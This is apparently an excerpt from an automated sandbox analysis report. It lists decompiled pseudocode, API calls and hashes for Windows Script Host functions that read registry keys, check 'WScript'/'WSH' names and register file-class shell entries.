                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t18;
                                                        				intOrPtr _t32;
                                                        				intOrPtr _t38;
                                                        				signed int _t41;
                                                        
                                                        				_t18 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t18 ^ _t41;
                                                        				_v2096 = __ecx;
                                                        				_t40 = 0x80000000;
                                                        				if(E00B83415( &_v2088, _t38, 0x80000000, _a4, 0x20019,  &_v2088) < 0) {
                                                        					L6:
                                                        					return E00B81335(_t21, _t32, _v8 ^ _t41, _t38, 0x20019, _t40);
                                                        				}
                                                        				_push(_t32);
                                                        				_v2092 = E00B842B5(_v2088, 0,  &_v2084, 0x400);
                                                        				RegCloseKey(_v2088);
                                                        				_t21 = _v2092;
                                                        				if(_v2092 >= 0) {
                                                        					E00B836CD( &_v2084, 0x40e, L"\\ScriptEngine");
                                                        					if(E00B83415( &_v2088, _t38, 0x80000000,  &_v2084, 0x20019,  &_v2088) >= 0) {
                                                        						_t40 = E00B842B5(_v2088, 0, _v2096, _a8);
                                                        						RegCloseKey(_v2088);
                                                        						if(_t40 < 0) {
                                                        							_t21 = _t40;
                                                        						} else {
                                                        							_t21 = 0;
                                                        						}
                                                        					}
                                                        				}
                                                        				_pop(_t32);
                                                        				goto L6;
                                                        			}















                                                        APIs
                                                          • Part of subcall function 00B83415: RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                          • Part of subcall function 00B842B5: RegQueryValueExW.ADVAPI32(74BA46CE,?,00000000,?,00020019,74BA46CE), ref: 00B8430C
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B84219
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B84275
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Close$OpenQueryValue
                                                        • String ID: \ScriptEngine
                                                        • API String ID: 1607946009-4133095719
                                                        • Opcode ID: e70b23a05f820d5784d3718256a517af9d8f174af8f4bd70793e76c184ad1db2
                                                        • Instruction ID: dc0de4d3beccc09333b667da70f17763109acf76db9ffd29f0423605edf40b4a
                                                        • Opcode Fuzzy Hash: e70b23a05f820d5784d3718256a517af9d8f174af8f4bd70793e76c184ad1db2
                                                        • Instruction Fuzzy Hash: 8D213E71914118ABDB21AE699D81FAEB7F8BB08710F0440E5B948E2260DA31DE45CFE4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B86B08(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a16, short* _a20) {
                                                        				void* _t14;
                                                        				struct HWND__* _t15;
                                                        				void* _t21;
                                                        				short _t23;
                                                        				intOrPtr* _t26;
                                                        				short* _t29;
                                                        				short* _t30;
                                                        				intOrPtr* _t32;
                                                        
                                                        				_t14 = _a8 - 1;
                                                        				if(_t14 == 0) {
                                                        					_t15 = GetActiveWindow();
                                                        					_t29 = _a20;
                                                        					 *(_t29 + 8) = _t15;
                                                        					 *_t29 = 0x4000;
                                                        					L7:
                                                        					return 0;
                                                        				}
                                                        				if(_t14 != 1) {
                                                        					return 0x80004001;
                                                        				}
                                                        				_t32 = _a16;
                                                        				if(_t32 == 0) {
                                                        					L9:
                                                        					return 0x80004005;
                                                        				}
                                                        				_t21 = 8;
                                                        				if(_t21 !=  *_t32 || E00B82753( *((intOrPtr*)(_t32 + 8)), L"WScript", 0xffffffff) != 0 && E00B82753( *((intOrPtr*)(_t32 + 8)), L"WSH", 0xffffffff) != 0) {
                                                        					goto L9;
                                                        				} else {
                                                        					_t30 = _a20;
                                                        					_t23 = 9;
                                                        					 *_t30 = _t23;
                                                        					_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 0x240));
                                                        					 *((intOrPtr*)(_t30 + 8)) = _t26;
                                                        					 *((intOrPtr*)( *_t26 + 4))(_t26);
                                                        					goto L7;
                                                        				}
                                                        			}











                                                        APIs
                                                        • GetActiveWindow.USER32 ref: 00B890A2
                                                          • Part of subcall function 00B82753: lstrlenW.KERNEL32(?,00000000,?,?,?,00B86DCF,00000000,.wsf,000000FF,?,0000002E), ref: 00B8276A
                                                          • Part of subcall function 00B82753: lstrlenW.KERNEL32(?,?,?,?,00B86DCF,00000000,.wsf,000000FF,?,0000002E), ref: 00B82771
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: lstrlen$ActiveWindow
                                                        • String ID: WSH$WScript
                                                        • API String ID: 1657113941-1019903269
                                                        • Opcode ID: 18bc2c6fc0eaa138eb2a010ef433b2e50c3ed6d7e8dce4538a89b2c7500e72ff
                                                        • Instruction ID: fbe5e1a28ada7a73629864dd10b94da222dcd8aff5176cd46c91922f3f4b08c7
                                                        • Opcode Fuzzy Hash: 18bc2c6fc0eaa138eb2a010ef433b2e50c3ed6d7e8dce4538a89b2c7500e72ff
                                                        • Instruction Fuzzy Hash: 32116935204305EFCB14FF69D842E6577E4EF05728B248599F929EB2B0D632DC82C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?), ref: 00B82B8D
                                                        • CoCreateInstance.OLE32(?,00000000,00000015,00B815B8,?), ref: 00B82BAC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CreateFromInstanceProg
                                                        • String ID: WScript.CreateObject
                                                        • API String ID: 2151042543-1366894974
                                                        • Opcode ID: 2d2d974bebe8b3c89a3429782d11875218df8827a47223013b4cf08fbf697d00
                                                        • Instruction ID: 65a77f3accb2572cc8a1d17c1f9218824d6e5ef8455e0ba088f49f52a3656219
                                                        • Opcode Fuzzy Hash: 2d2d974bebe8b3c89a3429782d11875218df8827a47223013b4cf08fbf697d00
                                                        • Instruction Fuzzy Hash: 6501D436681219BBDB113F489C02EE93BDADB04B50F0449E0FE057A1B2DA61D911D7D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 85%
                                                        			E00B8F8BF(intOrPtr __ebx, intOrPtr __edx, char* __edi, intOrPtr _a4) {
                                                        				signed int _v8;
                                                        				char _v268;
                                                        				void* _v272;
                                                        				void* __esi;
                                                        				signed int _t9;
                                                        				intOrPtr _t13;
                                                        				intOrPtr _t18;
                                                        				intOrPtr _t22;
                                                        				intOrPtr _t25;
                                                        				signed int _t28;
                                                        
                                                        				_t26 = __edi;
                                                        				_t25 = __edx;
                                                        				_t22 = __ebx;
                                                        				_t9 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t9 ^ _t28;
                                                        				_push("Shell");
                                                        				_t13 = E00B8F861( &_v268, 0x104, "SOFTWARE\\Classes\\%s\\%s", _a4);
                                                        				_t27 = _t13;
                                                        				if(_t13 >= 0) {
                                                        					_t18 = E00B8F813(0x80000001,  &_v268,  &_v272);
                                                        					_t27 = _t18;
                                                        					if(_t18 >= 0) {
                                                        						_t27 = E00B8F764(_v272, 0xb89b44, 0xb89b44, __edi);
                                                        						RegCloseKey(_v272);
                                                        					}
                                                        				}
                                                        				return E00B81335(_t27, _t22, _v8 ^ _t28, _t25, _t26, _t27);
                                                        			}














                                                        APIs
                                                          • Part of subcall function 00B8F861: _vsnprintf.MSVCRT ref: 00B8F894
                                                          • Part of subcall function 00B8F813: RegOpenKeyExA.ADVAPI32(?,80000001,00000000,00020006,00B8F915), ref: 00B8F82A
                                                          • Part of subcall function 00B8F813: RegCreateKeyA.ADVAPI32(?,80000001,00B8F915), ref: 00B8F83D
                                                          • Part of subcall function 00B8F764: RegOpenKeyExA.ADVAPI32(?,00B8FB79,00000000,00020006,00B8FB79), ref: 00B8F77B
                                                          • Part of subcall function 00B8F764: lstrlenA.KERNEL32(?,?,00B8F9CB,00000000,Shell,00B89B44,00B8FBBC,?,?,00B8FB79,WSFFile,00000000), ref: 00B8F78A
                                                          • Part of subcall function 00B8F764: RegSetValueExA.ADVAPI32(00B8FB79,?,00000000,00000001,?,00000001), ref: 00B8F79E
                                                          • Part of subcall function 00B8F764: RegCloseKey.ADVAPI32(00B8FB79), ref: 00B8F7A9
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B8F936
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseOpen$CreateValue_vsnprintflstrlen
                                                        • String ID: SOFTWARE\Classes\%s\%s$Shell
                                                        • API String ID: 1550461982-2614410927
                                                        • Opcode ID: e6e7b76dea49d55ef42a1b43f3911f27e0e975f5266a5743c02736c4ce171be1
                                                        • Instruction ID: 5edba3dc9a72df51a937f1b4de79004495afaf5852c2cd46b23eda32f8c6c24c
                                                        • Opcode Fuzzy Hash: e6e7b76dea49d55ef42a1b43f3911f27e0e975f5266a5743c02736c4ce171be1
                                                        • Instruction Fuzzy Hash: A1014F76901129BBCB10BBA49C05EEAB7EC9B55710F0001E1F944E7261DAB4DE80CBE4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%